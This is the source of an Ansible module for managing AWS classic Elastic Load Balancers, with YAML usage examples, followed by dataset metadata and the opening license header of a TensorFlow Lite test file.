subnets:
- subnet-abcd1234
- subnet-1a2b3c4d
listeners:
- protocol: http # options are http, https, ssl, tcp
load_balancer_port: 80
instance_port: 80
# Configure a health check and the access logs
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
health_check:
ping_protocol: http # options are http, https, ssl, tcp
ping_port: 80
ping_path: "/index.html" # not required for tcp or ssl
response_timeout: 5 # seconds
interval: 30 # seconds
unhealthy_threshold: 2
healthy_threshold: 10
access_logs:
interval: 5 # minutes (defaults to 60)
s3_location: "my-bucket" # This value is required if access_logs is set
s3_prefix: "logs"
# Ensure ELB is gone
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: absent
# Ensure ELB is gone and wait for check (for default timeout)
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: absent
wait: yes
# Ensure ELB is gone and wait for check with timeout value
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: absent
wait: yes
wait_timeout: 600
# Normally, this module will purge any listeners that exist on the ELB
# but aren't specified in the listeners parameter. If purge_listeners is
# false it leaves them alone
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
purge_listeners: no
# Normally, this module will leave availability zones that are enabled
# on the ELB alone. If purge_zones is true, then any extraneous zones
# will be removed
- amazon.aws.ec2_elb_lb:
name: "test-please-delete"
state: present
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
purge_zones: yes
# Creates a ELB and assigns a list of subnets to it.
- amazon.aws.ec2_elb_lb:
state: present
name: 'New ELB'
security_group_ids: 'sg-123456, sg-67890'
region: us-west-2
subnets: 'subnet-123456,subnet-67890'
purge_subnets: yes
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
# Create an ELB with connection draining, increased idle timeout and cross availability
# zone load balancing
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
connection_draining_timeout: 60
idle_timeout: 300
cross_az_load_balancing: "yes"
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
# Create an ELB with load balancer stickiness enabled
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
stickiness:
type: loadbalancer
enabled: yes
expiration: 300
# Create an ELB with application stickiness enabled
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
stickiness:
type: application
enabled: yes
cookie: SESSIONID
# Create an ELB and add tags
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
tags:
Name: "New ELB"
stack: "production"
client: "Bob"
# Delete all tags from an ELB
- amazon.aws.ec2_elb_lb:
name: "New ELB"
state: present
region: us-east-1
zones:
- us-east-1a
- us-east-1d
listeners:
- protocol: http
load_balancer_port: 80
instance_port: 80
tags: {}
"""
import random
import time
try:
import boto
import boto.ec2.elb
import boto.ec2.elb.attributes
import boto.vpc
from boto.ec2.elb.healthcheck import HealthCheck
from boto.ec2.tag import Tag
except ImportError:
pass # Taken care of by ec2.HAS_BOTO
from ansible.module_utils.six import string_types
from ansible.module_utils._text import to_native
from ..module_utils.core import AnsibleAWSModule
from ..module_utils.ec2 import AnsibleAWSError
from ..module_utils.ec2 import HAS_BOTO
from ..module_utils.ec2 import connect_to_aws
from ..module_utils.ec2 import get_aws_connection_info
def _throttleable_operation(max_retries):
def _operation_wrapper(op):
def _do_op(*args, **kwargs):
retry = 0
while True:
try:
return op(*args, **kwargs)
except boto.exception.BotoServerError as e:
if retry < max_retries and e.code in \
("Throttling", "RequestLimitExceeded"):
retry = retry + 1
time.sleep(min(random.random() * (2 ** retry), 300))
continue
else:
raise
return _do_op
return _operation_wrapper
def _get_vpc_connection(module, region, aws_connect_params):
try:
return connect_to_aws(boto.vpc, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json_aws(e, 'Failed to connect to AWS')
_THROTTLING_RETRIES = 5
class ElbManager(object):
def __init__(self, module, name, listeners=None, purge_listeners=None,
zones=None, purge_zones=None, security_group_ids=None,
health_check=None, subnets=None, purge_subnets=None,
scheme="internet-facing", connection_draining_timeout=None,
idle_timeout=None,
cross_az_load_balancing=None, access_logs=None,
stickiness=None, wait=None, wait_timeout=None, tags=None,
region=None,
instance_ids=None, purge_instance_ids=None, **aws_connect_params):
self.module = module
self.name = name
self.listeners = listeners
self.purge_listeners = purge_listeners
self.instance_ids = instance_ids
self.purge_instance_ids = purge_instance_ids
self.zones = zones
self.purge_zones = purge_zones
self.security_group_ids = security_group_ids
self.health_check = health_check
self.subnets = subnets
self.purge_subnets = purge_subnets
self.scheme = scheme
self.connection_draining_timeout = connection_draining_timeout
self.idle_timeout = idle_timeout
self.cross_az_load_balancing = cross_az_load_balancing
self.access_logs = access_logs
self.stickiness = stickiness
self.wait = wait
self.wait_timeout = wait_timeout
self.tags = tags
self.aws_connect_params = aws_connect_params
self.region = region
self.changed = False
self.status = 'gone'
self.elb_conn = self._get_elb_connection()
try:
self.elb = self._get_elb()
except boto.exception.BotoServerError as e:
module.fail_json_aws(e, msg='Unable to get all load balancers')
self.ec2_conn = self._get_ec2_connection()
@_throttleable_operation(_THROTTLING_RETRIES)
def ensure_ok(self):
if not self.elb:
# Zones and listeners will be added at creation
self._create_elb()
else:
if self._get_scheme():
# the only way to change the scheme is by recreating the resource
self.ensure_gone()
self._create_elb()
else:
self._set_zones()
self._set_security_groups()
self._set_elb_listeners()
self._set_subnets()
self._set_health_check()
# boto has introduced support for some ELB attributes in
# different versions, so we check first before trying to
# set them to avoid errors
if self._check_attribute_support('connection_draining'):
self._set_connection_draining_timeout()
if self._check_attribute_support('connecting_settings'):
self._set_idle_timeout()
if self._check_attribute_support('cross_zone_load_balancing'):
self._set_cross_az_load_balancing()
if self._check_attribute_support('access_log'):
self._set_access_log()
# add sticky options
self.select_stickiness_policy()
# ensure backend server policies are correct
self._set_backend_policies()
# set/remove instance ids
self._set_instance_ids()
self._set_tags()
def ensure_gone(self):
if self.elb:
self._delete_elb()
if self.wait:
elb_removed = self._wait_for_elb_removed()
# Unfortunately even though the ELB itself is removed quickly
# the interfaces take longer so reliant security groups cannot
# be deleted until the interface has registered as removed.
elb_interface_removed = self._wait_for_elb_interface_removed()
if not (elb_removed and elb_interface_removed):
self.module.fail_json(msg='Timed out waiting for removal of load balancer.')
def get_info(self):
try:
check_elb = self.elb_conn.get_all_load_balancers(self.name)[0]
except Exception:
check_elb = None
if not check_elb:
info = {
'name': self.name,
'status': self.status,
'region': self.region
}
else:
try:
lb_cookie_policy = check_elb.policies.lb_cookie_stickiness_policies[0].__dict__['policy_name']
except Exception:
lb_cookie_policy = None
try:
app_cookie_policy = check_elb.policies.app_cookie_stickiness_policies[0].__dict__['policy_name']
except Exception:
app_cookie_policy = None
info = {
'name': check_elb.name,
'dns_name': check_elb.dns_name,
'zones': check_elb.availability_zones,
'security_group_ids': check_elb.security_groups,
'status': self.status,
'subnets': self.subnets,
'scheme': check_elb.scheme,
'hosted_zone_name': check_elb.canonical_hosted_zone_name,
'hosted_zone_id': check_elb.canonical_hosted_zone_name_id,
'lb_cookie_policy': lb_cookie_policy,
'app_cookie_policy': app_cookie_policy,
'proxy_policy': self._get_proxy_protocol_policy(),
'backends': self._get_backend_policies(),
'instances': [instance.id for instance in check_elb.instances],
'out_of_service_count': 0,
'in_service_count': 0,
'unknown_instance_state_count': 0,
'region': self.region
}
# status of instances behind the ELB
if info['instances']:
info['instance_health'] = [dict(
instance_id=instance_state.instance_id,
reason_code=instance_state.reason_code,
state=instance_state.state
) for instance_state in self.elb_conn.describe_instance_health(self.name)]
else:
info['instance_health'] = []
# instance state counts: InService or OutOfService
if info['instance_health']:
for instance_state in info['instance_health']:
if instance_state['state'] == "InService":
info['in_service_count'] += 1
elif instance_state['state'] == "OutOfService":
info['out_of_service_count'] += 1
else:
info['unknown_instance_state_count'] += 1
if check_elb.health_check:
info['health_check'] = {
'target': check_elb.health_check.target,
'interval': check_elb.health_check.interval,
'timeout': check_elb.health_check.timeout,
'healthy_threshold': check_elb.health_check.healthy_threshold,
'unhealthy_threshold': check_elb.health_check.unhealthy_threshold,
}
if check_elb.listeners:
info['listeners'] = [self._api_listener_as_tuple(l)
for l in check_elb.listeners]
elif self.status == 'created':
# When creating a new ELB, listeners don't show in the
info['listeners'] = [self._listener_as_tuple(l)
for l in self.listeners]
else:
info['listeners'] = []
if self._check_attribute_support('connection_draining'):
info['connection_draining_timeout'] = int(self.elb_conn.get_lb_attribute(self.name, 'ConnectionDraining').timeout)
if self._check_attribute_support('connecting_settings'):
info['idle_timeout'] = self.elb_conn.get_lb_attribute(self.name, 'ConnectingSettings').idle_timeout
if self._check_attribute_support('cross_zone_load_balancing'):
is_cross_az_lb_enabled = self.elb_conn.get_lb_attribute(self.name, 'CrossZoneLoadBalancing')
if is_cross_az_lb_enabled:
info['cross_az_load_balancing'] = 'yes'
else:
info['cross_az_load_balancing'] = 'no'
info['tags'] = self.tags
return info
@_throttleable_operation(_THROTTLING_RETRIES)
def _wait_for_elb_removed(self):
polling_increment_secs = 15
max_retries = (self.wait_timeout // polling_increment_secs)
status_achieved = False
for x in range(0, max_retries):
try:
self.elb_conn.get_all_lb_attributes(self.name)
except (boto.exception.BotoServerError, Exception) as e:
if "LoadBalancerNotFound" in e.code:
status_achieved = True
break
else:
time.sleep(polling_increment_secs)
return status_achieved
@_throttleable_operation(_THROTTLING_RETRIES)
def _wait_for_elb_interface_removed(self):
polling_increment_secs = 15
max_retries = (self.wait_timeout // polling_increment_secs)
status_achieved = False
elb_interfaces = self.ec2_conn.get_all_network_interfaces(
filters={'attachment.instance-owner-id': 'amazon-elb',
'description': 'ELB {0}'.format(self.name)})
for x in range(0, max_retries):
for interface in elb_interfaces:
try:
result = self.ec2_conn.get_all_network_interfaces(interface.id)
if result == []:
status_achieved = True
break
else:
time.sleep(polling_increment_secs)
except (boto.exception.BotoServerError, Exception) as e:
if 'InvalidNetworkInterfaceID' in e.code:
status_achieved = True
break
else:
self.module.fail_json_aws(e, 'Failure while waiting for interface to be removed')
return status_achieved
@_throttleable_operation(_THROTTLING_RETRIES)
def _get_elb(self):
elbs = self.elb_conn.get_all_load_balancers()
for elb in elbs:
if self.name == elb.name:
self.status = 'ok'
return elb
def _get_elb_connection(self):
try:
return connect_to_aws(boto.ec2.elb, self.region,
**self.aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
self.module.fail_json_aws(e, 'Failure while connecting to AWS')
def _get_ec2_connection(self):
try:
return connect_to_aws(boto.ec2, self.region,
**self.aws_connect_params)
except (boto.exception.NoAuthHandlerFound, Exception) as e:
self.module.fail_json_aws(e, 'Failure while connecting to AWS')
@_throttleable_operation(_THROTTLING_RETRIES)
def _delete_elb(self):
result = self.elb_conn.delete_load_balancer(name=self.name)
if result:
self.changed = True
self.status = 'deleted'
def _create_elb(self):
listeners = [self._listener_as_tuple(l) for l in self.listeners]
self.elb = self.elb_conn.create_load_balancer(name=self.name,
zones=self.zones,
security_groups=self.security_group_ids,
complex_listeners=listeners,
subnets=self.subnets,
scheme=self.scheme)
if self.elb:
# might be eventual consistency issues and it doesn't necessarily
self.elb.listeners = self.listeners
self.changed = True
self.status = 'created'
def _create_elb_listeners(self, listeners):
self.changed = self.elb_conn.create_load_balancer_listeners(self.name,
complex_listeners=listeners)
def _delete_elb_listeners(self, listeners):
ports = [l[0] for l in listeners]
self.changed = self.elb_conn.delete_load_balancer_listeners(self.name,
ports)
def _set_elb_listeners(self):
listeners_to_add = []
listeners_to_remove = []
listeners_to_keep = []
for listener in self.listeners:
listener_as_tuple = self._listener_as_tuple(listener)
existing_listener_found = None
for existing_listener in self.elb.listeners:
if existing_listener[0] == int(listener['load_balancer_port']):
existing_listener_found = self._api_listener_as_tuple(existing_listener)
break
if existing_listener_found:
# Does it match exactly?
if listener_as_tuple != existing_listener_found:
# The ports are the same but something else is different,
# so we'll remove the existing one and add the new one
listeners_to_remove.append(existing_listener_found)
listeners_to_add.append(listener_as_tuple)
else:
listeners_to_keep.append(existing_listener_found)
else:
# We didn't find an existing listener, so just add the new one
listeners_to_add.append(listener_as_tuple)
if self.purge_listeners:
for existing_listener in self.elb.listeners:
existing_listener_tuple = self._api_listener_as_tuple(existing_listener)
if existing_listener_tuple in listeners_to_remove:
continue
if existing_listener_tuple in listeners_to_keep:
continue
listeners_to_remove.append(existing_listener_tuple)
if listeners_to_remove:
self._delete_elb_listeners(listeners_to_remove)
if listeners_to_add:
self._create_elb_listeners(listeners_to_add)
def _api_listener_as_tuple(self, listener):
base_tuple = listener.get_complex_tuple()
if listener.ssl_certificate_id and len(base_tuple) < 5:
return base_tuple + (listener.ssl_certificate_id,)
return base_tuple
def _listener_as_tuple(self, listener):
# N.B. string manipulations on protocols below (str(), upper()) is to
# ensure format matches output from ELB API
listener_list = [
int(listener['load_balancer_port']),
int(listener['instance_port']),
str(listener['protocol'].upper()),
]
# Instance protocol is not required by ELB API; it defaults to match
# load balancer protocol. We'll mimic that behavior here
if 'instance_protocol' in listener:
listener_list.append(str(listener['instance_protocol'].upper()))
else:
listener_list.append(str(listener['protocol'].upper()))
if 'ssl_certificate_id' in listener:
listener_list.append(str(listener['ssl_certificate_id']))
return tuple(listener_list)
def _enable_zones(self, zones):
try:
self.elb.enable_zones(zones)
except boto.exception.BotoServerError as e:
self.module.fail_json_aws(e, msg='unable to enable zones')
self.changed = True
def _disable_zones(self, zones):
try:
self.elb.disable_zones(zones)
except boto.exception.BotoServerError as e:
self.module.fail_json_aws(e, msg='unable to disable zones')
self.changed = True
def _attach_subnets(self, subnets):
self.elb_conn.attach_lb_to_subnets(self.name, subnets)
self.changed = True
def _detach_subnets(self, subnets):
self.elb_conn.detach_lb_from_subnets(self.name, subnets)
self.changed = True
def _set_subnets(self):
if self.subnets:
if self.purge_subnets:
subnets_to_detach = list(set(self.elb.subnets) - set(self.subnets))
subnets_to_attach = list(set(self.subnets) - set(self.elb.subnets))
else:
subnets_to_detach = None
subnets_to_attach = list(set(self.subnets) - set(self.elb.subnets))
if subnets_to_attach:
self._attach_subnets(subnets_to_attach)
if subnets_to_detach:
self._detach_subnets(subnets_to_detach)
def _get_scheme(self):
if self.scheme:
if self.elb.scheme != self.scheme:
if not self.wait:
self.module.fail_json(msg="Unable to modify scheme without using the wait option")
return True
return False
def _set_zones(self):
if self.zones:
if self.purge_zones:
zones_to_disable = list(set(self.elb.availability_zones) -
set(self.zones))
zones_to_enable = list(set(self.zones) -
set(self.elb.availability_zones))
else:
zones_to_disable = None
zones_to_enable = list(set(self.zones) -
set(self.elb.availability_zones))
if zones_to_enable:
self._enable_zones(zones_to_enable)
if zones_to_disable:
self._disable_zones(zones_to_disable)
def _set_security_groups(self):
if self.security_group_ids is not None and set(self.elb.security_groups) != set(self.security_group_ids):
self.elb_conn.apply_security_groups_to_lb(self.name, self.security_group_ids)
self.changed = True
def _set_health_check(self):
if self.health_check:
health_check_config = {
"target": self._get_health_check_target(),
"timeout": self.health_check['response_timeout'],
"interval": self.health_check['interval'],
"unhealthy_threshold": self.health_check['unhealthy_threshold'],
"healthy_threshold": self.health_check['healthy_threshold'],
}
update_health_check = False
if not self.elb.health_check:
self.elb.health_check = HealthCheck()
for attr, desired_value in health_check_config.items():
if getattr(self.elb.health_check, attr) != desired_value:
setattr(self.elb.health_check, attr, desired_value)
update_health_check = True
if update_health_check:
self.elb.configure_health_check(self.elb.health_check)
self.changed = True
def _check_attribute_support(self, attr):
return hasattr(boto.ec2.elb.attributes.LbAttributes(), attr)
def _set_cross_az_load_balancing(self):
attributes = self.elb.get_attributes()
if self.cross_az_load_balancing:
if not attributes.cross_zone_load_balancing.enabled:
self.changed = True
attributes.cross_zone_load_balancing.enabled = True
else:
if attributes.cross_zone_load_balancing.enabled:
self.changed = True
attributes.cross_zone_load_balancing.enabled = False
self.elb_conn.modify_lb_attribute(self.name, 'CrossZoneLoadBalancing',
attributes.cross_zone_load_balancing.enabled)
def _set_access_log(self):
attributes = self.elb.get_attributes()
if self.access_logs:
if 's3_location' not in self.access_logs:
self.module.fail_json(msg='s3_location information required')
access_logs_config = {
"enabled": True,
"s3_bucket_name": self.access_logs['s3_location'],
"s3_bucket_prefix": self.access_logs.get('s3_prefix', ''),
"emit_interval": self.access_logs.get('interval', 60),
}
update_access_logs_config = False
for attr, desired_value in access_logs_config.items():
if getattr(attributes.access_log, attr) != desired_value:
setattr(attributes.access_log, attr, desired_value)
update_access_logs_config = True
if update_access_logs_config:
self.elb_conn.modify_lb_attribute(self.name, 'AccessLog', attributes.access_log)
self.changed = True
elif attributes.access_log.enabled:
attributes.access_log.enabled = False
self.changed = True
self.elb_conn.modify_lb_attribute(self.name, 'AccessLog', attributes.access_log)
def _set_connection_draining_timeout(self):
attributes = self.elb.get_attributes()
if self.connection_draining_timeout is not None:
if not attributes.connection_draining.enabled or \
attributes.connection_draining.timeout != self.connection_draining_timeout:
self.changed = True
attributes.connection_draining.enabled = True
attributes.connection_draining.timeout = self.connection_draining_timeout
self.elb_conn.modify_lb_attribute(self.name, 'ConnectionDraining', attributes.connection_draining)
else:
if attributes.connection_draining.enabled:
self.changed = True
attributes.connection_draining.enabled = False
self.elb_conn.modify_lb_attribute(self.name, 'ConnectionDraining', attributes.connection_draining)
def _set_idle_timeout(self):
attributes = self.elb.get_attributes()
if self.idle_timeout is not None:
if attributes.connecting_settings.idle_timeout != self.idle_timeout:
self.changed = True
attributes.connecting_settings.idle_timeout = self.idle_timeout
self.elb_conn.modify_lb_attribute(self.name, 'ConnectingSettings', attributes.connecting_settings)
def _policy_name(self, policy_type):
return 'ec2-elb-lb-{0}'.format(to_native(policy_type, errors='surrogate_or_strict'))
def _create_policy(self, policy_param, policy_meth, policy):
getattr(self.elb_conn, policy_meth)(policy_param, self.elb.name, policy)
def _delete_policy(self, elb_name, policy):
self.elb_conn.delete_lb_policy(elb_name, policy)
def _update_policy(self, policy_param, policy_meth, policy_attr, policy):
self._delete_policy(self.elb.name, policy)
self._create_policy(policy_param, policy_meth, policy)
def _set_listener_policy(self, listeners_dict, policy=None):
policy = [] if policy is None else policy
for listener_port in listeners_dict:
if listeners_dict[listener_port].startswith('HTTP'):
self.elb_conn.set_lb_policies_of_listener(self.elb.name, listener_port, policy)
def _set_stickiness_policy(self, elb_info, listeners_dict, policy, **policy_attrs):
for p in getattr(elb_info.policies, policy_attrs['attr']):
if str(p.__dict__['policy_name']) == str(policy[0]):
if str(p.__dict__[policy_attrs['dict_key']]) != str(policy_attrs['param_value'] or 0):
self._set_listener_policy(listeners_dict)
self._update_policy(policy_attrs['param_value'], policy_attrs['method'], policy_attrs['attr'], policy[0])
self.changed = True
break
else:
self._create_policy(policy_attrs['param_value'], policy_attrs['method'], policy[0])
self.changed = True
self._set_listener_policy(listeners_dict, policy)
def select_stickiness_policy(self):
if self.stickiness:
if 'cookie' in self.stickiness and 'expiration' in self.stickiness:
self.module.fail_json(msg='\'cookie\' and \'expiration\' can not be set at the same time')
elb_info = self.elb_conn.get_all_load_balancers(self.elb.name)[0]
d = {}
for listener in elb_info.listeners:
d[listener[0]] = listener[2]
listeners_dict = d
if self.stickiness['type'] == 'loadbalancer':
policy = []
policy_type = 'LBCookieStickinessPolicyType'
if self.module.boolean(self.stickiness['enabled']):
if 'expiration' not in self.stickiness:
self.module.fail_json(msg='expiration must be set when type is loadbalancer')
try:
expiration = self.stickiness['expiration'] if int(self.stickiness['expiration']) else None
except ValueError:
self.module.fail_json(msg='expiration must be set to an integer')
policy_attrs = {
'type': policy_type,
'attr': 'lb_cookie_stickiness_policies',
'method': 'create_lb_cookie_stickiness_policy',
'dict_key': 'cookie_expiration_period',
'param_value': expiration
}
policy.append(self._policy_name(policy_attrs['type']))
self._set_stickiness_policy(elb_info, listeners_dict, policy, **policy_attrs)
elif not self.module.boolean(self.stickiness['enabled']):
if len(elb_info.policies.lb_cookie_stickiness_policies):
if elb_info.policies.lb_cookie_stickiness_policies[0].policy_name == self._policy_name(policy_type):
self.changed = True
else:
self.changed = False
self._set_listener_policy(listeners_dict)
self._delete_policy(self.elb.name, self._policy_name(policy_type))
elif self.stickiness['type'] == 'application':
policy = []
policy_type = 'AppCookieStickinessPolicyType'
if self.module.boolean(self.stickiness['enabled']):
if 'cookie' not in self.stickiness:
self.module.fail_json(msg='cookie must be set when type is application')
policy_attrs = {
'type': policy_type,
'attr': 'app_cookie_stickiness_policies',
'method': 'create_app_cookie_stickiness_policy',
'dict_key': 'cookie_name',
'param_value': self.stickiness['cookie']
}
policy.append(self._policy_name(policy_attrs['type']))
self._set_stickiness_policy(elb_info, listeners_dict, policy, **policy_attrs)
elif not self.module.boolean(self.stickiness['enabled']):
if len(elb_info.policies.app_cookie_stickiness_policies):
if elb_info.policies.app_cookie_stickiness_policies[0].policy_name == self._policy_name(policy_type):
self.changed = True
self._set_listener_policy(listeners_dict)
self._delete_policy(self.elb.name, self._policy_name(policy_type))
else:
self._set_listener_policy(listeners_dict)
def _get_backend_policies(self):
policies = []
if self.elb.backends is not None:
for backend in self.elb.backends:
if backend.policies is not None:
for policy in backend.policies:
policies.append(str(backend.instance_port) + ':' + policy.policy_name)
return policies
def _set_backend_policies(self):
ensure_proxy_protocol = False
replace = []
backend_policies = self._get_backend_policies()
for listener in self.listeners:
want = False
if 'proxy_protocol' in listener and listener['proxy_protocol']:
ensure_proxy_protocol = True
want = True
if str(listener['instance_port']) + ':ProxyProtocol-policy' in backend_policies:
if not want:
replace.append({'port': listener['instance_port'], 'policies': []})
elif want:
replace.append({'port': listener['instance_port'], 'policies': ['ProxyProtocol-policy']})
if ensure_proxy_protocol:
self._set_proxy_protocol_policy()
for item in replace:
self.elb_conn.set_lb_policies_of_backend_server(self.elb.name, item['port'], item['policies'])
self.changed = True
def _get_proxy_protocol_policy(self):
if self.elb.policies is not None and self.elb.policies.other_policies is not None:
for policy in self.elb.policies.other_policies:
if policy.policy_name == 'ProxyProtocol-policy':
return policy.policy_name
return None
def _set_proxy_protocol_policy(self):
proxy_policy = self._get_proxy_protocol_policy()
if proxy_policy is None:
self.elb_conn.create_lb_policy(
self.elb.name, 'ProxyProtocol-policy', 'ProxyProtocolPolicyType', {'ProxyProtocol': True}
)
self.changed = True
def _diff_list(self, a, b):
b = set(b)
return [aa for aa in a if aa not in b]
def _get_instance_ids(self):
instances = []
if self.elb.instances is not None:
for instance in self.elb.instances:
instances.append(instance.id)
return instances
def _set_instance_ids(self):
assert_instances = self.instance_ids or []
has_instances = self._get_instance_ids()
add_instances = self._diff_list(assert_instances, has_instances)
if add_instances:
self.elb_conn.register_instances(self.elb.name, add_instances)
self.changed = True
if self.purge_instance_ids:
remove_instances = self._diff_list(has_instances, assert_instances)
if remove_instances:
self.elb_conn.deregister_instances(self.elb.name, remove_instances)
self.changed = True
def _set_tags(self):
if self.tags is None:
return
params = {'LoadBalancerNames.member.1': self.name}
tagdict = dict()
if self.elb:
current_tags = self.elb_conn.get_list('DescribeTags', params,
[('member', Tag)])
tagdict = dict((tag.Key, tag.Value) for tag in current_tags
if hasattr(tag, 'Key'))
dictact = dict(set(self.tags.items()) - set(tagdict.items()))
if dictact:
for i, key in enumerate(dictact):
params['Tags.member.%d.Key' % (i + 1)] = key
params['Tags.member.%d.Value' % (i + 1)] = dictact[key]
self.elb_conn.make_request('AddTags', params)
self.changed = True
dictact = dict(set(tagdict.items()) - set(self.tags.items()))
if dictact:
for i, key in enumerate(dictact):
params['Tags.member.%d.Key' % (i + 1)] = key
self.elb_conn.make_request('RemoveTags', params)
self.changed = True
def _get_health_check_target(self):
protocol = self.health_check['ping_protocol'].upper()
path = ""
if protocol in ['HTTP', 'HTTPS'] and 'ping_path' in self.health_check:
path = self.health_check['ping_path']
return "%s:%s%s" % (protocol, self.health_check['ping_port'], path)
def main():
argument_spec = dict(
state={'required': True, 'choices': ['present', 'absent']},
name={'required': True},
listeners={'default': None, 'required': False, 'type': 'list', 'elements': 'dict'},
purge_listeners={'default': True, 'required': False, 'type': 'bool'},
instance_ids={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
purge_instance_ids={'default': False, 'required': False, 'type': 'bool'},
zones={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
purge_zones={'default': False, 'required': False, 'type': 'bool'},
security_group_ids={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
security_group_names={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
health_check={'default': None, 'required': False, 'type': 'dict'},
subnets={'default': None, 'required': False, 'type': 'list', 'elements': 'str'},
purge_subnets={'default': False, 'required': False, 'type': 'bool'},
scheme={'default': 'internet-facing', 'required': False, 'choices': ['internal', 'internet-facing']},
connection_draining_timeout={'default': None, 'required': False, 'type': 'int'},
idle_timeout={'default': None, 'type': 'int', 'required': False},
cross_az_load_balancing={'default': None, 'type': 'bool', 'required': False},
stickiness={'default': None, 'required': False, 'type': 'dict'},
access_logs={'default': None, 'required': False, 'type': 'dict'},
wait={'default': False, 'type': 'bool', 'required': False},
wait_timeout={'default': 60, 'type': 'int', 'required': False},
tags={'default': None, 'required': False, 'type': 'dict'}
)
module = AnsibleAWSModule(
argument_spec=argument_spec,
check_boto3=False,
mutually_exclusive=[['security_group_ids', 'security_group_names']]
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if not region:
module.fail_json(msg="Region must be specified as a parameter, in EC2_REGION or AWS_REGION environment variables or in boto configuration file")
name = module.params['name']
state = module.params['state']
listeners = module.params['listeners']
purge_listeners = module.params['purge_listeners']
instance_ids = module.params['instance_ids']
purge_instance_ids = module.params['purge_instance_ids']
zones = module.params['zones']
purge_zones = module.params['purge_zones']
security_group_ids = module.params['security_group_ids']
security_group_names = module.params['security_group_names']
health_check = module.params['health_check']
access_logs = module.params['access_logs']
subnets = module.params['subnets']
purge_subnets = module.params['purge_subnets']
scheme = module.params['scheme']
connection_draining_timeout = module.params['connection_draining_timeout']
idle_timeout = module.params['idle_timeout']
cross_az_load_balancing = module.params['cross_az_load_balancing']
stickiness = module.params['stickiness']
wait = module.params['wait']
wait_timeout = module.params['wait_timeout']
tags = module.params['tags']
if state == 'present' and not listeners:
module.fail_json(msg="At least one listener is required for ELB creation")
if state == 'present' and not (zones or subnets):
module.fail_json(msg="At least one availability zone or subnet is required for ELB creation")
if wait_timeout > 600:
module.fail_json(msg='wait_timeout maximum is 600 seconds')
if security_group_names:
security_group_ids = []
try:
ec2 = connect_to_aws(boto.ec2, region, **aws_connect_params)
if subnets:
vpc_conn = _get_vpc_connection(module=module, region=region, aws_connect_params=aws_connect_params)
vpc_id = vpc_conn.get_all_subnets([subnets[0]])[0].vpc_id
filters = {'vpc_id': vpc_id}
else:
filters = None
grp_details = ec2.get_all_security_groups(filters=filters)
for group_name in security_group_names:
if isinstance(group_name, string_types):
group_name = [group_name]
group_id = [str(grp.id) for grp in grp_details if str(grp.name) in group_name]
security_group_ids.extend(group_id)
except boto.exception.NoAuthHandlerFound as e:
module.fail_json_aws(e)
elb_man = ElbManager(module, name, listeners, purge_listeners, zones,
purge_zones, security_group_ids, health_check,
subnets, purge_subnets, scheme,
connection_draining_timeout, idle_timeout,
cross_az_load_balancing,
access_logs, stickiness, wait, wait_timeout, tags,
region=region, instance_ids=instance_ids, purge_instance_ids=purge_instance_ids,
**aws_connect_params)
if cross_az_load_balancing and not elb_man._check_attribute_support('cross_zone_load_balancing'):
module.fail_json(msg="You must install boto >= 2.18.0 to use the cross_az_load_balancing attribute")
if connection_draining_timeout and not elb_man._check_attribute_support('connection_draining'):
module.fail_json(msg="You must install boto >= 2.28.0 to use the connection_draining_timeout attribute")
if idle_timeout and not elb_man._check_attribute_support('connecting_settings'):
module.fail_json(msg="You must install boto >= 2.33.0 to use the idle_timeout attribute")
if state == 'present':
elb_man.ensure_ok()
elif state == 'absent':
elb_man.ensure_gone()
ansible_facts = {'ec2_elb': 'info'}
ec2_facts_result = dict(changed=elb_man.changed,
elb=elb_man.get_info(),
ansible_facts=ansible_facts)
module.exit_json(**ec2_facts_result)
if __name__ == '__main__':
main()
| true | true |
1c3c8d3daec588738c0d7cd5687b65688f07c05a | 3,306 | py | Python | tensorflow/lite/testing/op_tests/sparse_to_dense.py | EricRemmerswaal/tensorflow | 141ff27877579c81a213fa113bd1b474c1749aca | [
"Apache-2.0"
] | 190,993 | 2015-11-09T13:17:30.000Z | 2022-03-31T23:05:27.000Z | tensorflow/lite/testing/op_tests/sparse_to_dense.py | EricRemmerswaal/tensorflow | 141ff27877579c81a213fa113bd1b474c1749aca | [
"Apache-2.0"
] | 48,461 | 2015-11-09T14:21:11.000Z | 2022-03-31T23:17:33.000Z | tensorflow/lite/testing/op_tests/sparse_to_dense.py | EricRemmerswaal/tensorflow | 141ff27877579c81a213fa113bd1b474c1749aca | [
"Apache-2.0"
] | 104,981 | 2015-11-09T13:40:17.000Z | 2022-03-31T19:51:54.000Z | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
